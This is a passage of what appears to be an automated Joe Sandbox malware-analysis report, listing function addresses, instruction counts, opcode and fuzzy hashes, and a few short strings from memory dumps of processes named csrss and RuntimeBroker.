                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4628a7e4849d393784ee989d8ed4809375549ca9db471b5541fbb6bcb097d0c
                                                      • Instruction ID: f3d4e085bc6c5acc53db3d3df450aa129fcea85a893356c57538809b3b7e23c5
                                                      • Opcode Fuzzy Hash: b4628a7e4849d393784ee989d8ed4809375549ca9db471b5541fbb6bcb097d0c
                                                      • Instruction Fuzzy Hash: 02E04F7294F7C08FC70B9B7488B98503F60EF2721174A41EAC045CF1B3DA6A8849C711
                                                      Function 00007FF848EBD8E9 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cedcf65cbf565e8bc13eb93ae76e08cf0ceaebb5935e5a79fc15442905327a46
                                                      • Instruction ID: 85572a5e45cd1c369aa1d6bf560f13143b757b9d6cd218781dd89967dc619601
                                                      • Opcode Fuzzy Hash: cedcf65cbf565e8bc13eb93ae76e08cf0ceaebb5935e5a79fc15442905327a46
                                                      • Instruction Fuzzy Hash: 24E01A3294E7C08FC70B9B7488B98503F60EF2761174A41EAC085CF1B3D66A8849C712
                                                      Function 00007FF848EB7C44 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dbd73fa94358818184ed736a35888d1213e25d001b95c5930502828affd512ce
                                                      • Instruction ID: 7ff830a7443cad6512879e5d8c0f948295f3bacf7d98cd8823ab38c64c157b8f
                                                      • Opcode Fuzzy Hash: dbd73fa94358818184ed736a35888d1213e25d001b95c5930502828affd512ce
                                                      • Instruction Fuzzy Hash: 08E01A34A8A7804FC70AAB3888A58943FB0EF57211B4A80EBD045CB1B3D62D9C4EC752
                                                      Function 00007FF848EB80D9 Relevance: .0, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 487fd515aaf4dc1a5f2f81f7933881eaa18897ea4ccfd2762966a6fd5dba7741
                                                      • Instruction ID: b752384c769f0f410027a9006e33708fca3bd32db75b6e4923dfe2a1ffce5200
                                                      • Opcode Fuzzy Hash: 487fd515aaf4dc1a5f2f81f7933881eaa18897ea4ccfd2762966a6fd5dba7741
                                                      • Instruction Fuzzy Hash: BBE04F3165AB804FC70AA728886D9547BF1EF6B211B4A40EBC045CB5B3D61DDC49C702
                                                      Function 00007FF848E95178 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 47cbcdc54ea2d82ff77161c0754e1444da161be50743cd5490d6412486fd817f
                                                      • Instruction ID: 32e6ea605917876ef5762ba9247008bf6a6c45deb24af416aa9ffb141f28c6a4
                                                      • Opcode Fuzzy Hash: 47cbcdc54ea2d82ff77161c0754e1444da161be50743cd5490d6412486fd817f
                                                      • Instruction Fuzzy Hash: 5DD0A730B60A0D4B8B0CB63D8458430F3D5F7AA6167D452BDD40BC3281ED25ECC6CB84
                                                      Function 00007FF848E956D8 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 33048c691754e2148c641c71409f8f72af6773d4cb460236c5ad15c8e747d6fc
                                                      • Instruction ID: 25bcc22724a5fb7d8c689320c1e06a891c540dc00e4d48c87d4623df9079018b
                                                      • Opcode Fuzzy Hash: 33048c691754e2148c641c71409f8f72af6773d4cb460236c5ad15c8e747d6fc
                                                      • Instruction Fuzzy Hash: 01D0A730B60A0D4B8B0CB63D8458530F3D1F7AA6167D4527CD40BC3281ED25ECC6CB84
                                                      Function 00007FF848E93A10 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                      • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                      • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                      • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                      Function 00007FF848EBA900 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Function 00007FF848EBA870 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Function 00007FF848E83824 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction ID: b1aa58225af30ef3009926a3ad24ed8b1d7ed8fd6556f6ede8ea2fe6e7ca0ed1
                                                      • Opcode Fuzzy Hash: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction Fuzzy Hash: 5BE01A20E0C51A4FFB54F614C8517BD63A1FF98380FA000B8D92E936D2CF386D809A59
                                                      Function 00007FF848EB2290 Relevance: .0, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                      Function 00007FF848EB71D0 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction ID: 627c17e139fed78debd96b5f264f4ccc04e0e0a128c9c2da64bcc411b2ed45b6
                                                      • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction Fuzzy Hash: 73D01234B549044FC70CB6388C99C747391EB6E216B9540ADD00AD77B1DA6ADC89CB41
                                                      Function 00007FF848EBBB50 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction ID: a1b89c7fc47824ca41353d7ed97788391dad4335844ea0bde91eb149b60312ea
                                                      • Opcode Fuzzy Hash: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction Fuzzy Hash: BAD01234B549094FC70CF638985987473A1EB6A216B9540B9D00AC72B1DA6ADC89C741
                                                      Function 00007FF848E81953 Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 19b46ba83e76117e48abc6ba5b4c2eb87e0bbb1d978990c6e02cf6f6adf8319c
                                                      • Instruction ID: d0ebef60d2e61abe5eba543c6d03d9e9fc34528dc0fd53af5c68b558b8c7e63b
                                                      • Opcode Fuzzy Hash: 19b46ba83e76117e48abc6ba5b4c2eb87e0bbb1d978990c6e02cf6f6adf8319c
                                                      • Instruction Fuzzy Hash: 77D05E31A1CA494EEB45B7B0841A2BD6292BF10340F880478D85E971C3CF3E3400AA98
                                                      Function 00007FF848E806AD Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction ID: c31856955ed2e3c74bff67d5eed7038733c80ad951e00bd8430a1a3eff3b721d
                                                      • Opcode Fuzzy Hash: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction Fuzzy Hash: 86C08C00D0F90B08E440316F14020ACA2007FC47A4FE10032C01C42092EE3D20C5116E
                                                      Function 00007FF848E8559A Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction ID: 93df89259070d39eeee891dfa952953b187c30ae293fd6bc712e26a92ea0700f
                                                      • Opcode Fuzzy Hash: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction Fuzzy Hash: FCD05222C1D9228EFA72214008241BD0201AB803B0FA90772D86D2B0C09F7CAC019A2A
                                                      Function 00007FF848E812D8 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction ID: 4aa18af1f661fabb0a2e2203a43a442a2c3407ad42402b65ed2ba776a251d591
                                                      • Opcode Fuzzy Hash: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction Fuzzy Hash: D6C08C305108088FC908FB28C88480837A0FF09200BC20090E008C7170D229DCC1D741
                                                      Function 00007FF848E84E07 Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c6890a0eb8bab5686fb30b497a215103f2846e55e1d9ca9a48602b72c5889091
                                                      • Instruction ID: f1ed2dd81c9e9fd527580de7112224a41dd9be07f583e78048e1b3997346ca06
                                                      • Opcode Fuzzy Hash: c6890a0eb8bab5686fb30b497a215103f2846e55e1d9ca9a48602b72c5889091
                                                      • Instruction Fuzzy Hash: 89C08C02E0EC169AE25A220440221BE44029F80784F9800B5E00E873CADF0C1E0142CA
                                                      Function 00007FF848E806D0 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction ID: 37703ee556c4e8627d10b7c80c769574e06979db5dbbed10f1728ee220f40bb0
                                                      • Opcode Fuzzy Hash: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction Fuzzy Hash: 0BB01200C5E40F04E40431BB084306C70407FC4244FC10070D40C41182E97D1094025A

                                                      Non-executed Functions

                                                      Function 00007FF848E809B0 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: bfa2c339f050b900016796cb309f7cc88d50831665c47b0694f3740441f1cca7
                                                      • Instruction ID: d8d3bf98ff88aa51002e8d513fa4bc641ecc0acbef1d3040d477bc56c04107bd
                                                      • Opcode Fuzzy Hash: bfa2c339f050b900016796cb309f7cc88d50831665c47b0694f3740441f1cca7
                                                      • Instruction Fuzzy Hash: 9F515ED6ADE86A7DE61D36BDB4111FD6B44EF812B5F4C93B7E04C890838E18608186FD

                                                      Executed Functions

                                                      Function 00007FF848E90D48 Relevance: 2.8, Strings: 2, Instructions: 277COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5X_H$<L_^
                                                      • API String ID: 0-2316843489
                                                      • Opcode ID: f49657793d883871d935ac8975df7d35cdc78b157752cdb0dd29029cdee48e1c
                                                      • Instruction ID: dfd8186261bf55f107047c0531ed6ce800cd592ac8ce6a70db78644deb514436
                                                      • Opcode Fuzzy Hash: f49657793d883871d935ac8975df7d35cdc78b157752cdb0dd29029cdee48e1c
                                                      • Instruction Fuzzy Hash: 1191F0B1A1DA8D8FD789EB6888663AD7FE0FB56354F4401BAC00AD72D2EBB91404C701
                                                      Function 00007FF848EA12B2 Relevance: .8, Instructions: 777COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ea0000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: af9edde0c91634111fca78c0f858e119407db49b7dc3428cb1114b871530e7c1
                                                      • Instruction ID: 05db5e36a8ac570d2e71854176abf2cf13c3276e7370fcb517478817268fb95d
                                                      • Opcode Fuzzy Hash: af9edde0c91634111fca78c0f858e119407db49b7dc3428cb1114b871530e7c1
                                                      • Instruction Fuzzy Hash: 4B329331E1CD4A9FE698FA28949677973E2FF94B80F0445B9D00EC3287DE39AC428745
                                                      Function 00007FF848E90E43 Relevance: .2, Instructions: 173COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 51a5e401a1b91b63a8f86ff8888ae849e68922083cb1b3a0f31da42d373c9d3a
                                                      • Instruction ID: bb7ac90d746a35542652091857c0a57d7eb01b96a17993375ce853d0fc52ff1f
                                                      • Opcode Fuzzy Hash: 51a5e401a1b91b63a8f86ff8888ae849e68922083cb1b3a0f31da42d373c9d3a
                                                      • Instruction Fuzzy Hash: 5151B2B1A19A5D8EE388AF58989A7BC7FE1FB46364F4001BEC00AD37D1DBB51411C744
                                                      Function 00007FF848EC38ED Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: H_H
                                                      • API String ID: 0-284316983
                                                      • Opcode ID: 86181f43d5fa065c202cdd2b746f1e479e80dc40fcb650800cb0ac1cf1533f52
                                                      • Instruction ID: 48225e7550c8305a2cd63d5beac5b28d36554d1777d275a27aa452008f46a5f0
                                                      • Opcode Fuzzy Hash: 86181f43d5fa065c202cdd2b746f1e479e80dc40fcb650800cb0ac1cf1533f52
                                                      • Instruction Fuzzy Hash: AD81A121E1C98A5FEAA8FA2C84963B577D2FF58791F0441B9D40EC72C7DE38AC418785
                                                      Function 00007FF848EC3943 Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: H_H
                                                      • API String ID: 0-284316983
                                                      • Opcode ID: 4216eb9f26ae00eb42d7edfb3b910069057ee1c1314ddf7d07702fa2345a39a6
                                                      • Instruction ID: 3744a93a42e08fdff3660a55920232c7780e17b3dacec96e2f9ac547ba2008ea
                                                      • Opcode Fuzzy Hash: 4216eb9f26ae00eb42d7edfb3b910069057ee1c1314ddf7d07702fa2345a39a6
                                                      • Instruction Fuzzy Hash: B9518F21E1C94E5FEAD8FE2C84963B973D2FB98780F048179D80EC7287DE38A8414785
                                                      Function 00007FF848EC21E9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: dcb61017aa6ebd67def6948da7fe7457f7ca9c4e5845bcdc95d5f64eeebfe7b0
                                                      • Instruction ID: ac406ac42852808f62c905d119de1f589d0be17851a49c244d590aa1efe3aa34
                                                      • Opcode Fuzzy Hash: dcb61017aa6ebd67def6948da7fe7457f7ca9c4e5845bcdc95d5f64eeebfe7b0
                                                      • Instruction Fuzzy Hash: F7F06D7194E7C44FCB1AEA348868454BFA0EF6761174A41EEC086CF1A7EA2D8885C701
                                                      Function 00007FF848ECA8E9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: 4d1dc3c7272bbd0ba39532849e8e187d002855a1b83da22f18e7fa0e8252d0a0
                                                      • Instruction ID: e8b5015f11dccd5efb59787eb677b8d5bbef237379f64d70a153d6433356170c
                                                      • Opcode Fuzzy Hash: 4d1dc3c7272bbd0ba39532849e8e187d002855a1b83da22f18e7fa0e8252d0a0
                                                      • Instruction Fuzzy Hash: E1F06D71A0E7C48FC71AAA3488694647FA0EF6760174A42EFC045CF1A3EA2D8C89CB01
                                                      Function 00007FF848ECA859 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: b63eb4b94b2a5ec45ff8642ae5e9edcd211a73fb929116bfb9e0b5cd34666344
                                                      • Instruction ID: 4a1c13e3be066d09a3ee9e2441e8f466112b83567c4b14db9f2655e3e0faa60e
                                                      • Opcode Fuzzy Hash: b63eb4b94b2a5ec45ff8642ae5e9edcd211a73fb929116bfb9e0b5cd34666344
                                                      • Instruction Fuzzy Hash: 43F0657190E7C44FD71AEA7548698557FA0EF6720174A42EFC045CF1A3EA2DC885C701
                                                      Function 00007FF848ECADE9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: eb20b7538ac511a0eb12270b0ab9d68e738de0ce56f0672437c29057eadebb95
                                                      • Instruction ID: 82530b54d08026d188c1e7ab89e3f63f7f4bbc0d318394a18d4b9d66b4404b82
                                                      • Opcode Fuzzy Hash: eb20b7538ac511a0eb12270b0ab9d68e738de0ce56f0672437c29057eadebb95
                                                      • Instruction Fuzzy Hash: 54E0487184E7D44FCB06EB3488698553F60EF67715B8A40DEC046CF1B3E62D984AC701
                                                      Function 00007FF848EC2279 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 7c44b2ad038512428087d663be142df0efeecb1e77df74c176335ee64e638e88
                                                      • Instruction ID: dce711c93e5fd0f4f7f1ad47b073dff326ba95210c49aa258905e2be3404389f
                                                      • Opcode Fuzzy Hash: 7c44b2ad038512428087d663be142df0efeecb1e77df74c176335ee64e638e88
                                                      • Instruction Fuzzy Hash: 4BE01A7194E7C48FCB5AEB74886A9543FA0EE6B25178A40EEC049CF1B3E62D8849C711
                                                      Function 00007FF848EC80D9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
